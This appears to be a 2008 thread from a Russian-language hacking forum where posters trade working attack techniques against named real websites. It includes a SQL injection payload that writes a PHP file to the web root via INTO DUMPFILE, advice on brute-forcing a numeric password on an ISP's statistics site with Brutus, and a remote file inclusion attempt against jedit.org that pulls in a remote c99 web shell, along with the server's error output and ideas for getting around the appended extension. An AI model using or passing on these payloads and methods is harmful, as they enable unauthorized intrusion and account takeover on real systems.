 |
|

31.03.2008, 16:55
|
|
Новичок
Регистрация: 30.03.2008
Сообщений: 5
С нами:
9534127
Репутация:
0
|
|
Не могу если найду подобный сайт напишу
|
|
|

31.03.2008, 20:30
|
|
Новичок
Регистрация: 04.01.2008
Сообщений: 6
С нами:
9659174
Репутация:
21
|
|
Hi,
Is it possible to dump something INTO Dumpfile, when magic_quotes_gpc is switched on?
I tried to hex-encode the path, but no file is created then.
e.g:
www.site.com/UNION/**/SELECT/**/0x3c3f70687020706870696e666f28293b203f3e /**/INTO/**/DUMPFILE/**/'/var/www'/*
Works!
But
www.site.com/UNION/**/SELECT/**/0x3c3f70687020706870696e666f28293b203f3e /**/INTO/**/DUMPFILE/**/0x2f7661722f777777/*
doesn work!
Is there a possibility to dump files, if magic_quotes_gpc ist switched on?
Thank you.
|
|
|

31.03.2008, 20:43
|
|
Новичок
Регистрация: 30.03.2008
Сообщений: 5
С нами:
9534127
Репутация:
0
|
|
Вот нашел похожее
даже круче
http://fialki.ho.com.ua/products_pictures/
вот от создателей
http://www.shop-script.ru/images/
Последний раз редактировалось Hell0; 31.03.2008 в 21:01..
|
|
|

31.03.2008, 20:47
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
2Lidloses_Auge
No, this construction does not work without the quotes, hex-encoding does not help
__________________
Карфаген должен быть разрушен...
|
|
|

31.03.2008, 21:14
|
|
Новичок
Регистрация: 31.03.2008
Сообщений: 2
С нами:
9533163
Репутация:
0
|
|
Всем привет.
Подскажите плз как настроить брутфорс доля взлома такой вот байды
http://stat.corbina.com.ua/
Известен ник и известно что пароль только цыфры. Просьба помочь-долбался ничего не выходит  .
|
|
|

01.04.2008, 15:25
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
А какой конкретно брут? Их навалом ).Например, тот же Brutus AET 2 (кажись так:РР).Там можно настроить по многим протоколам,кроме ссл,но для этого другие бруты есть. Гайдов по нему тоже полно( на русском кстати) .Там должны быть настройки полным перебором, по словарю(он те наф не нужен).И указан диапазон фицр в виде 0123456789.Что-то вроде того:Р
|
|
|

01.04.2008, 17:41
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
Warning: main(http://site/RamShellc99.php\0.html): failed to open stream: Connection refused in /home/groups/j/je/jedit/htdocs/index.php on line 63
Warning: main(): Failed opening 'http://site/RamShellc99.php\0.html' for inclusion (include_path='.:/usr/local/share/pear') in /home/groups/j/je/jedit/htdocs/index.php on line 63
Имеется запрос:
http://www.jedit.org/index.phppage=http://site/RamShellc99.php%00
В результате получается такое :
Warning: main(): Failed opening 'http://site/RamShellc99.php\0.html' for inclusion (include_path='.:/usr/local/share/pear') in /home/groups/j/je/jedit/htdocs/index.php on line 63
Я так понял,тут две веши:
1.У меня жутко кривые куриные лапы.
2.Фильтрация %0 на \
3.Какие-то проблемы с url- encoding ( ??? )
В данном случае, меня интересует , почему не заливается шелл =(. Про инклуды аля ../../../../../etc/pwd пожалуйста не надо)
|
|
|

01.04.2008, 18:46
|
|
Постоянный
Регистрация: 25.03.2008
Сообщений: 670
С нами:
9541766
Репутация:
2407
|
|
Некоторые мысли...
Скрипт их прибавляет расширение .html ко всему инклудящемуся, а %00 по-видимому не прокатывает.
По идее, можно переименовать шелл в нечто вроде shell.html и заставить апач на удалённом хосте исполнять html как php, но даже в этом случае вылетает ошибка failed to open stream: Connection timed out, почему - не знаю. (пытался ко многим сайтам так обращаться, везде тайм-аут, даже к их собственному)
|
|
|

01.04.2008, 18:57
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
Сообщение от d_x
Некоторые мысли...
Скрипт их прибавляет расширение .html ко всему инклудящемуся, а %00 по-видимому не прокатывает.
По идее, можно переименовать шелл в нечто вроде shell.html и заставить апач на удалённом хосте исполнять html как php, но даже в этом случае вылетает ошибка failed to open stream: Connection timed out, почему - не знаю. (пытался ко многим сайтам так обращаться, везде тайм-аут, даже к их собственному)
Может я ща чё ляпну, но шеллкод разве может исполняться в любом файле ? (шеллкод системная с*ка  ) Мошь он просто выдаёт несоответствие расширений, и потому не исполняет. Ждём-с мнение экспертов ).
|
|
|

01.04.2008, 19:00
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
include($page.php) зло (
|
|
|
|
 |
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 17 (пользователей: 0 , гостей: 17)
|
|
|
|